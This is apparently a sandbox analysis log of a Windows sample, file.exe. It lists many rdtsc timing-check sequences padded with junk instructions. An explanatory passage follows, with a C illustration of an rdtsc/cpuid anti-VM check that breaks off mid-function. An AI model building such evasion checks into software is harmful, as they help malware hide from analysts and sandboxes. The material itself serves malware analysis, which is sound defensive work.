                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CB39 second address: 136CB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CB3D second address: 136CB41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136CF58 second address: 136CF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137345B second address: 137345F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137345F second address: 137346E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9EA509B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137346E second address: 1373492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D9h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373492 second address: 1373496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373496 second address: 137349A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137349A second address: 13734A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9EA509B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373760 second address: 1373765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738E6 second address: 13738EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738EE second address: 13738F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738F6 second address: 13738FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13738FC second address: 1373912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F9EA4BB43C6h 0x00000010 jno 00007F9EA4BB43C6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373912 second address: 137391A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373D8D second address: 1373D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741BA second address: 13741EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9EA509B5E2h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741EA second address: 13741FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F9EA4BB43C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13741FA second address: 1374200 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374200 second address: 1374206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1374206 second address: 1374223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E8h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D903 second address: 137D927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9EA4BB43C6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F9EA4BB43D1h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D927 second address: 137D931 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA509B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137D931 second address: 137D93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F9EA4BB43CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137DC4E second address: 137DC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9EA509B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F9EA509B5D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389934 second address: 1389940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F9EA4BB43C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389940 second address: 1389944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1389944 second address: 1389954 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F9EA4BB43CCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E903 second address: 138E90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E90A second address: 138E913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E4E6 second address: 138E4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138E4EA second address: 138E504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923A2 second address: 13923EC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9EA509B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9EA509B5E7h 0x0000000f jne 00007F9EA509B5DCh 0x00000015 popad 0x00000016 jl 00007F9EA509B614h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F9EA509B5E2h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13923EC second address: 1392406 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9EA4BB43C6h 0x00000008 jbe 00007F9EA4BB43C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F9EA4BB43C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1392406 second address: 139240A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139240A second address: 139240E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139456D second address: 1394573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394573 second address: 139457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13940D5 second address: 13940EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13940EB second address: 1394108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9EA4BB43D3h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394108 second address: 139410C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139425C second address: 1394274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43CEh 0x00000007 jo 00007F9EA4BB43C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1394274 second address: 139427A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139427A second address: 139427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139427E second address: 1394284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A896E second address: 13A897F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9EA4BB43CCh 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A897F second address: 13A89A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9EA509B5D6h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9EA509B5DBh 0x00000014 jng 00007F9EA509B5DEh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A89A7 second address: 13A89AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A89AD second address: 13A89C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA509B5E8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A8C93 second address: 13A8C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A903E second address: 13A9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9044 second address: 13A904A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A904A second address: 13A9061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9EA509B5DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9061 second address: 13A9065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9065 second address: 13A906B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9205 second address: 13A922A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F9EA4BB43D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnc 00007F9EA4BB43C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A922A second address: 13A924C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9EA509B5D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9EA509B5E3h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A924C second address: 13A9277 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA4BB43C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F9EA4BB43EAh 0x00000011 jnp 00007F9EA4BB43D2h 0x00000017 jnl 00007F9EA4BB43C6h 0x0000001d jng 00007F9EA4BB43C6h 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F9EA4BB43C6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A9DCD second address: 13A9DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4ED4 second address: 13B4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4ED9 second address: 13B4F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9EA509B5E3h 0x00000008 jmp 00007F9EA509B5DDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4F04 second address: 13B4F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B4F0B second address: 13B4F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B926B second address: 13B9276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9276 second address: 13B927E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9C50 second address: 13C9C6E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F9EA4BB43D1h 0x00000008 js 00007F9EA4BB43C6h 0x0000000e pop esi 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB2C3 second address: 13CB2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB2C7 second address: 13CB2DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA4BB43D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB78 second address: 13CDB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB7E second address: 13CDB84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB84 second address: 13CDB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDCD1 second address: 13CDD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9EA4BB43CBh 0x0000000d jmp 00007F9EA4BB43D8h 0x00000012 popad 0x00000013 jc 00007F9EA4BB43E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDD07 second address: 13CDD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDDC9 second address: 13DDDEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F9EA4BB43CFh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F9EA4BB43C6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDDEA second address: 13DDDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCD55 second address: 13DCD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCD5B second address: 13DCD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD66B second address: 13DD683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD94C second address: 13DD950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD950 second address: 13DD956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD956 second address: 13DD963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD963 second address: 13DD969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD969 second address: 13DD96F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD96F second address: 13DD977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD977 second address: 13DD98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD98D second address: 13DD996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E092B second address: 13E095B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9EA509B5E2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0A4D second address: 13E0A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1F2F second address: 13E1F39 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA509B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3BE5 second address: 13E3C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F9EA4BB43D2h 0x0000000d jmp 00007F9EA4BB43D9h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56904AB second address: 56904BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690528 second address: 569056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007F9EA4BB43D2h 0x0000000b or ax, DCA8h 0x00000010 jmp 00007F9EA4BB43CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9EA4BB43D5h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569056C second address: 5690599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9EA509B5E3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690599 second address: 569059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569059F second address: 56905A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56905A5 second address: 56905A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56905A9 second address: 56905B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
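The interceptor entries above record pairs of rdtsc reads separated by junk push/pop/jmp filler; the second read is compared with the first, and an inflated cycle count is taken as a sign of a hypervisor or an instruction-level emulator. The following is an added illustration of that timing check in its textbook form (rdtsc, a forced VM exit via cpuid, rdtsc, then a median over many samples against a threshold). It is not code recovered from file.exe, and the 1000-cycle cut-off is an assumption, not a value taken from the sample.

```c
/* Added illustration of an RDTSC timing check; not code from file.exe.
 * The cycle threshold (1000) is an assumption for the demo. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* cpuid is intercepted by every mainstream hypervisor, so the cycles
 * between the two rdtsc reads jump from hundreds to thousands when the
 * code runs inside a VM. */
static uint64_t timed_cpuid(void)
{
    unsigned int a, b, c, d;
    uint64_t t0 = __rdtsc();
    __asm__ volatile("cpuid" : "=a"(a), "=b"(b), "=c"(c), "=d"(d) : "a"(0), "c"(0));
    uint64_t t1 = __rdtsc();
    return t1 - t0;
}
#endif

static int cmp_u64(const void *x, const void *y)
{
    uint64_t a = *(const uint64_t *)x, b = *(const uint64_t *)y;
    return (a > b) - (a < b);
}

/* Median of the sampled deltas (sorts in place). The median ignores a few
 * samples inflated by an interrupt or cache miss, which a single pair of
 * reads would not. */
uint64_t median_delta(uint64_t *deltas, size_t n)
{
    qsort(deltas, n, sizeof *deltas, cmp_u64);
    return deltas[n / 2];
}

/* 1 when the median exceeds the threshold, i.e. the check concludes
 * "virtualized"; 0 otherwise. */
int rdtsc_check_trips(uint64_t *deltas, size_t n, uint64_t threshold)
{
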